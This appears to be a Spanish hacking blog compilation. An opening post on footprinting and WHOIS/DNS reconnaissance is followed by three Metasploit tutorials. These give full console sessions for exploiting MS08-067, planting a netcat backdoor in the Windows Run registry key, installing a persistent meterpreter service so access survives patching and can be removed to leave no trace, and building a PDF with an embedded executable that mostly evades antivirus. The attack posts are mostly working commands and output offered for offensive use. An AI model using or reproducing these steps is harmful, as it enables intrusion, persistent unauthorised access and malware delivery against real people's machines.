May 09

Footprinting

Este footpriting es un proceso que se hace antes de hacer un ataque a alguna empresa. Consiste en  hacer una recopilación de toda la información necesaria para hacer un perfecto ataque intrusión, En esta parte del Footpriting es donde el atacante obtiene, reúne y organiza toda la información posible sobre su objetivo o su víctima, mientras más información obtiene con mayor precisión puede lanzar un ataque, información como:

•   Rango de Red y sub-red (Network Range y subnet mask)
•   Acertar maquinas o computadoras activas
•   Puertos abiertos y las aplicaciones que están corriendo en ellos.
•   Detectar Sistemas Operativos
•   Nombres de Dominios (Domain Names)
•   Bloques de Red (Network Blocks)
•   Direcciones IP específicas
•   País y Ciudad donde se encuentran los Servidores
•   Información de Contacto (números telefónicos, emails, etc.)
•   DNS records

Mucha de la información, antes mencionada, como Domain Names, algunas direcciones IP, País, Ciudad, e información de contacto los Crackers la obtienen buscando en las bases de datos de WHOIS.
Las bases de datos WHOIS mantienen detalles de direcciones IP registradas en 5 regiones del Mundo. Estas bases de datos son manejadas por 5 organizaciones llamadas Regional Internet Registry (RIR).
Las 5 bases de datos WHOIS están localizadas en:
1. América del Norte (ARIN)
2. América del Sur, América Central y el Caribe (LACNIC)
3. Europa, el medio Este y Asia Central (RIPE NCC)
4. Asia del Pacifico (APNIC)
5. África (AfriNIC)

También se tocada algunos temas como la descripción de las tools (herramientas) , se hará una breve descripción sobre cada funcionamiento de cada una y un breve ejemplo.

¿qué Hace un hacker malicioso?

El Footpriting es el proceso de creación de un mapa de redes y de sistema una organización , es este proceso esta  incluido  la recopilación de información de cualquier medio, en el Footpriting se hace determinación de la target ( definición….) y después de ello hace un tipo de recopilación e información con métodos no intrusivos, una de las herramientas mas esenciales y primordiales es GOOGLE , es indispensable conocer (Como intittle, site, allinurl, etc) .

Junto al escaneo, enumeración y Footpriting es una de las tres etapas utilizada antes de hacer un ataque , en esta etapa se toma el 90% y el otro 10% si atacando. Los siete pasos que se toman antes del ataque  son divididos en las tres etapas nombradas anteriores:

–   Detectar  la información inicial
–   Ubicar el  rango de la red
–   Comprobación de los equipos activos
–   Descubricion de los puerto abiertos y puntos de acceso
–   Detención del sistema operativo
–   Descubricion de servicios en los puertos
–   Mapa de la red

El Footpriting se aplica en los dos primeros pasos de las etapas de un ataque de un hacker , algunas de las fuentes comunes de información incluyen el uso de :

–   Domain name lookup
–   Whois
–   Nslookup

La mayoría parte de la información  que puede recopilar libremente y de manera legal, es muy importante comprender el sistema de resolución de dominio (DNS) para lograr una profunda compresión de esta etapa y del funcionamiento de internet.

Inteligencia competitiva:

[/color]

Implica la averiguación de información sobre la competencia (productos, tecnologías, marketing, etc.) existen varias herramientas que pueden ser utilizadas para esto, la inteligencia competitiva incluye diversos temas como:

–   Recopilación de datos
–   Análisis de datos
–   Verificación de información
–   Seguridad de información

Existen muchas empresas privadas que ofrecen el servicio de inteligencia competitiva, buscando en internet la dirección de correo electrónica o el nombre de una empresa podemos entrar en las listas de correo, foros, etc. Información sobre la empresa de donde trabaja ( esta parte es unas de  las primordiales en el Footpriting), otra fuente de información de útil son las redes sociales y los sitios de empleos. En esta parte podemos hacer el uso de una herramienta llamada Wayback Machine.

Este es un simple ejemplo del funcionamiento de Wayback Machine, hay nos muestra las modificaciones q a tenido la pagina http://www.senado.gov.ar/ de 1997 hasta la fecha.

Enumeración de DNS

[/color]

El sistema de resolución de nombres permite básicamente transformar nombres de domino en direcciones IP, le corresponde a los RFC 1034 y 1035, la enumeración de DNS  es el proceso de ubicación de todos los servidores DNS y sus correspondientes registros de una organización, una compañía puede tener DNS internos y externos que pueden brindar diferentes datos del objetivo, el sistema DNS utiliza tres componentes principales:

–   Clientes DNS
–   Servidores DNS
–   Zonas de autoridad

El DNS cosiste en un conjunto jerárquico de servidores DNS, cada dominio o  subdominio tiene una o mas zonas de autoridad que publican la información acerca del dominio, la jerarquía de las zonas de autoridad coincide con la jerarquía de los dominios, al inicio de esa jerarquía se encuentra los servidores de raíz , que corresponden cuando se busca resolver un dominio de primer y segundo nivel, es posible utilizar herramientas varias y sitios web especializados para realizar esta etapa de enumeración de DNS, tal ves la herramienta elemental para la  enumeración  de DNS  es NSLookup, dispone en toso los  sistemas operativos.

Durante el año 2008 se encontraron diversas vulnerabilidades al sistema DNS y a una de las herramientas mas difundidas, es  muy  importante conocer esta parte de un  punto  de vista técnico e histórico.

DNS Zone Transfer:

Los datos contenidos en una zona DNS son sensibles por naturaleza, Individualmente, los registros DNS  no son sensibles, pero si  un atacante obtiene una copia entera de un dominio, obtiene una lista completa de todos los host de ese dominio, un atacante no necesita herramientas especiales para obtener una zona DNS este mal configurado y que permita a cualquiera realizar una transferencia de zona, en generalmente solo los servidores DNS  dependientes necesitan realizar transferencia de zona.

DNS Denial of Servicie:

Si un atacante puede realizar una transferencia de zona, también puede realizar ataques de denegación de servicio contra esos servidores DNS realizando múltiples peticiones.

Whois

Es una herramienta y  un protocolo que identifica información de registración de un dominio. Esta definido en el RFC 3912. El Whois evoluciono desde los primero Unix hasta los actuales. Las consultas se han  realizados tradicionalmente usando una interfaz de línea de comandos , pero actualmente existen multitud de paginas web que permiten realizar estas consultas, aunque siguen dependiendo internamente del protocolo original.
Utilizando el whois, es posible recopilar información de registro como ser el  nombre de la persona que realizo el registro, dominio , su correo electrónico, numero telefónico y  números IP de sus servidores principales, esta información puede atentar contra la integridad y la privacidad y permitir a los spammer capturar direcciones.las herramientas whois recogen información  sobre esta registración oficial  obligatoria.
Su base de datos incluye información sobre direcciones IP y datos del dueño de un sitio, Puede ser consultadas mediante  herramientas de whois o su propio sitio web. Un ethical hacker deberá conocer sobre direcciones IP y sobre como encontrar la ubicación geográfica y camino hacia un objetivo.

Órganos autorizados de asignación de números

[/b]

la IANA es el órgano responsable de la coordinación de algunos de los elementos clave que mantener el  buen funcionamiento de internet, si bien la internet es conocido  por ser una red mundial  libre del centro  de coordinación, existe una necesidad tenica  de algunas de las principales partes de internet para ser coordinada a nivel mundial y esta función esta a cargo de la IANA.
La IANA las diversas actividades se pueden agrupar en tres categorías:
Nombres de dominios: IANA administra el DNS raíz, el Int y. Arpa dominios IDN practicas y un recurso.
Numero de recursos: IANA coordina la reserva mundial de la propiedad intelectual y en forma de números proporcionándoles a los registros de internet.
Protocolos de asignaciones: Protocolo de internet, (los sistemas  de enumeración son gestionados por la IANA , en relación con los organismos de normalización.

Es una organización sin fines de lucro que opera nivel internacional, responsable de asignar espacio de direcciones numéricas de protocolo de internet (IP), identificadores de protocolo y de las funciones de gestión (o administración) del sistema de nombre sd de dominio de primer nivel genéricos ( gTLD ) y de códigos de funciones de gestión.

Entre otros.

Entidades de registro por región geográfica

[/b]

AFRINIC – Afrincan Network Información Centre ( http://www.afrinic.net )

AfriNIC es una organización no gubernamental y sin  fines de lucro basada en las membrecía de organización. Su principal función es servir a la región de áfrica como del registro regional de internet, como los otros cuatro continentes que tienen sus propios RIR.

ARIN – American Registry for Internet Numbers (http://ws.arin.net/whois )

Proporciona un mecanismo para encontrar el contacto y registro
Información registrada por los recursos con ARIN. Contiene la base de datos de propiedad intelectual  direcciones, números de sistema autónomo, las organizaciones o clientes que son. Asociados con estos recursos, y los Puntos de Contacto [POC].

El ARIN WHOIS  NO localiza cualquier información relacionada con el dominio, ni ninguna  información relativa a las redes militares. Localizar la información de dominio, y whois.nic.mil militar para la información de la red.

LACNIC – Latin America & Caribbean Network Information Center ( http://www.lacnic.net./  )

Administra recursos de numeración de internet contribuyendo a la creación de oportunidades de colaboración y cooperación en beneficio de la comunidad regional , la visión de esta entidad es ser líder en construccion y articulacion  de esfuerzos colaborativos para el desarrollo y estabilidad de internet en America latina y el caribe.

RIPE – Reseaux IP Europeens Network Coordinación Centre ( http://www.ripe.net/ )

Es una entidad encargada de distribuir y asignar los recursos de internet (IP4 y IP6 espacio de direcciones, sistemas autónomo  AS los números de delegaciones DNS invertida)  a las organizaciones en la región  de servicio de RIP NCC.

APNIC  – Asia Pacific Network Information Centre ( http://www.apnic.net/apnic-bin/whois.pl/ )

APNIC es un proceso abierto, basada en membrecía, sin fines de lucro. Es uno de los cinco Registros Regionales de Internet (RIR), encargada de asegurar la distribución justa y responsable de gestión de direcciones IP y los recursos conexos. Estos recursos son necesarios para el funcionamiento estable y fiable de la Internet mundial.

Herramientas

[/color][/size]

WEB DATA EXTRACTOR

Una utilidad de gran alcance del extractor de los datos del acoplamiento de la tela. Extraiga el URL, la etiqueta del meta (título, desc, palabra clave), el texto del cuerpo, el email, el teléfono, el fax de Web site, los resultados de la búsqueda o la lista de URLs. Extracción de alta velocidad, multi-roscada, exacta – ahorra directamente datos al archivo de disco. El programa tiene filtros numerosos para restringir la sesión, como – el filtro del URL, la fecha modificada, el tamaño del archivo, el etc. Permite niveles seleccionables por el usuario de la repetición, los hilos de rosca de la recuperación, descanso, la ayuda del poder y muchas otras opciones.

Nslookup

Nslookup es un programa, utilizado para saber si el DNS está resolviendo correctamente los nombres y las IP. Se utiliza con el comando nslookup, que funciona tanto en Windows como en UNIX para obtener la dirección IP conociendo el nombre, y viceversa.

HTTrack web Copier

Le permite descargar un sitio Web desde Internet a un directorio local, construyendo recursivamente todos los directorios, la obtención de HTML, imágenes y otros archivos desde el servidor a su ordenador. HTTrack organiza el sitio original en la estructura de enlaces relativos. Simply open a page of the “mirrored” website in your browser, and you can browse the site from link to link, as if you were viewing it online. Basta con abrir una página de los “espejos” en el sitio web de su navegador, y puede navegar por el sitio de un enlace a otro, como si estuviera viendo en línea. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack también puede actualizar un sitio reflejado existente, y reanudar descargas interrumpidas. HTTrack is fully configurable, and has an integrated help system. HTTrack es totalmente configurable, y se ha integrado un sistema de ayuda

Tracert

Tracert envía un paquete de eco ICMP con el nombre de acogida, pero con un TTL de 1 y, a continuación, con un TTL de 2 y, a continuación, con un TTL de 3 y así sucesivamente. Tracert entonces obtener “TTL expiró en tránsito” mensaje de los destinos a los enrutadores hasta que el equipo host, finalmente se llega y responde con la norma ICMP “respuesta de eco” de paquetes.

Sam Spade

[/color]

Esta herramienta provee información sobre el DNS, WHOIS, IPBlock y permite hacer Ping, Dig, Trace, etc.


(pagina web)


(software)

Path Analyzer Pro

Analizador de ruta Pro ofrece avanzadas de red con la ruta de búsqueda de pruebas de rendimiento, DNS, Whois, y la red de resolución para investigar problemas de red. Mediante la integración de todas estas características de gran alcance en una sencilla interfaz gráfica, el Analizador de Ruta Pro se ha convertido en una herramienta indispensable para cualquier red, sistemas, profesionales o de seguridad en Windows y Mac OS X

Website Watcher

Es una utilidad para detectar si ha habido algún cambio en una pagina web que denote un actualización de la misma. Usando un mínimo de conexión , almacena las dos versiones de la pagina en la que se ha detectado el cambio y destaca los cambios producidos en el texto, dispone de multitud de filtros para ignorar cambios que no interesen  como por ejemplos nuevos banners, incluye también un gestor de favoritos integrado y se integra con internet Explorer, Netscape y opera

Autor: Progresive Death
Fuente: portalhacker

Herramientas en línea (Online) para Footprinting:

SamSpade www.samspade.org
Herramienta WHOIS

DNSstuff www..dnsstuff.com/
Múltiples herramientas para extraer información de los DNS

People Search People.yahoo.com
Buscador de personas e información de contacto

Intellius www.intellius.com
Buscador de persona e información de contacto

NetCraft www.netcraft.com
Detector de OS

Whois www.whois.org
Herramienta WHOIS

Herramientas de programas (software) para Footprinting:SamSpade www.softpedia.com/get/Network-Tools/Network-Tools-Suites/Sam-Spade.shtml

Esta herramienta provee información sobre el DNS, WHOIS, IPBlock y permite hacer Ping, Dig, Trace, etc.

SamSpade

Web Data Extractor Tool http://rafasoft.com/
Esta herramienta extrae data de los meta tags, enlaces, email, números telefónicos, fax, entre otras cosas y permite almacenarlos en el disco duro.

Spiderfoot http://binarypool.com/spiderfoot/
Esta herramienta provee información sobre sub-dominios, versión del web server, dominios similares, emails y bloques de red (Netblocks)

May 06

Subir Archivos y Crear Clave dentro del Registro [BackDoor ]

[Metasploit By: Shell Root]

Cuando ingresamos a un P.C remoto, con ayuda del Metasploit, además de tener el PAYLOAD con Meterpreter, tenemos varias opciones. Una de ellas conseguir la Shell Remota, Ingresar Claves al Registro de Windows, Subir Archivos del P.C atacante hacia la P.C Remota.

Primero ingresaremos a la P.C con el exploit:

  • exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:

  • windows/shell/bind_tcp
  • windows/shell/reverse_tcp

En este caso usaremos el PAYLOAD windows/shell/bind_tcp.

Código:

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 7 days ago (2009.12.10)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.3      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.0.3      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >

Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.

Código:

meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

    -r        Upload recursively.

meterpreter >

Así:

Código:

meterpreter > upload C:\Windows\System32\nc.exe C:\Windows\System32\[*] uploading  : C:WindowsSystem32nc.exe -> C:WindowsSystem32[*] uploaded   : C:WindowsSystem32nc.exe -> C:WindowsSystem32\nc.exe
meterpreter >

Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:

  • HKLM\Software\Microsoft\Windows\CurrentVersion \Run

Asi:

Código:

meterpreter > reg setval -k HKLM\Software\Microsoft\Windows\CurrentVersion\Run -v Hacked -d 'C:WindowsSystem32nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter >

Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:

Código:

meterpreter > reboot
Rebooting...
meterpreter >

Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:

Código:

msf > connect 192.168.0.3 1234[*] Connected to 192.168.0.3:1234
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsShell Root Remoto>

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/subir-archivos-y-crear-clave-dentro-del.html

May 06

Crear un Backdoor con meterpreter

Primero, necesitamos una sesión de meterpreter en el sistema remoto.

Código:
                                  _            
                                 | |      o    
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / _|/ _|/  /  _|  |  
  |  |  |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
                           /|                  
                           |                   

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

meterpreter >

Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

Código:
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:WINDOWSTEMPHdOFwlxzpobWuh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

Código:
meterpreter > reboot
Rebooting...
meterpreter >

Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

Código:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

meterpreter >

Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

Código:
meterpreter > run metsvc -r
[*] Removing the existing Meterpreter service
[*] Creating a temporary installation directory C:WINDOWSTEMPQQqawIYOjLq...
[*]  >> Uploading metsvc.exe...
[*] Stopping the service...
	 * Stopping service metsvc
 * Removing service
Service metsvc successfully removed.

meterpreter >
May 06

Incrustar ejecutable dentro de un archivo de Adobe PDF

Retomando un poco lo que es la herramienta ‘Metasploit‘, encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.

Descripción del Exploit
Ubicación:/windows/fileformat/adobe_pdf_embedded_exe
Nombre:
Adobe PDF Embedded EXE Social Engineering
Versión:
0
Plataforma:Windows
Licencia:Metasploit Framework License (BSD)
Rango:
Excelente
Proporciando por:Colin Ames amesc@attackresearch.com>
Objetivos disponibles:
Adobe Reader v8.x, v9.x (Windows XP SP3 English)
Descripción:
Este módulo del Metasploit incorpora una carga de un archivo PDF existente.
Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles (Windows XP … English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.

Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea 232 del exploit, donde reemplazamos este código:

ruby Código:

 

 

  1. 232.  dirs = [ “Desktop”, “My Documents”, “Documents” ]

 

 

 

por este:

ruby Código:

 

 

  1. 232.  dirs = [ “Desktop”, “My Documents”, “Documents”, “Escritorio”, “Mis Documentos”]

 

 

 

Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro PoC!

Abrimos la consola del Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf “infectado”.

Código:
root@bt:/opt/metasploit3/msf3# msfconsole

               o                       8         o   o
               8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

     =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
     =[ svn r9040 updated today (2010.04.07)

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

 Name        Current Setting   Required  Description
 ----        ---------------   --------  -----------
 EXENAME                       no        The Name of payload exe.
 FILENAME    evil.pdf          no        The output filename.
 INFILENAME                    yes       The Input PDF filename.
 OUTPUTPATH  ./data/exploits/  no        The location to output the file.

Exploit target:

 Id  Name
 --  ----
 0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)

msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit[*] Started bind handler[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...[*] Parsing Successful.[*] Using '/root/cmd.exe' as payload...[*] Creating 'PoC_PDF_EXE.pdf' file...[*] Generated output file /root/PoC_PDF_EXE.pdf[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >

PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.

Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.

Miremos que nos dice el Scanner de NoVirusThanks:

File Info

Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10% )
Status: INFECTED

Detections

a-squared – –
Avast – JS:Pdfka-XN [Expl]
AVG – –
Avira AntiVir – –
BitDefender – Exploit.PDF-Dropper.Gen
ClamAV – –
Comodo – –
Dr.Web – –
Ewido – –
F-PROT6 – –
G-Data – –
Ikarus T3 – –
Kaspersky – –
McAfee – –
NOD32 – –
Panda – –
Solo – –
TrendMicro – –
VBA32 – –
Zoner – –

Scan report generated by NoVirusThanks.org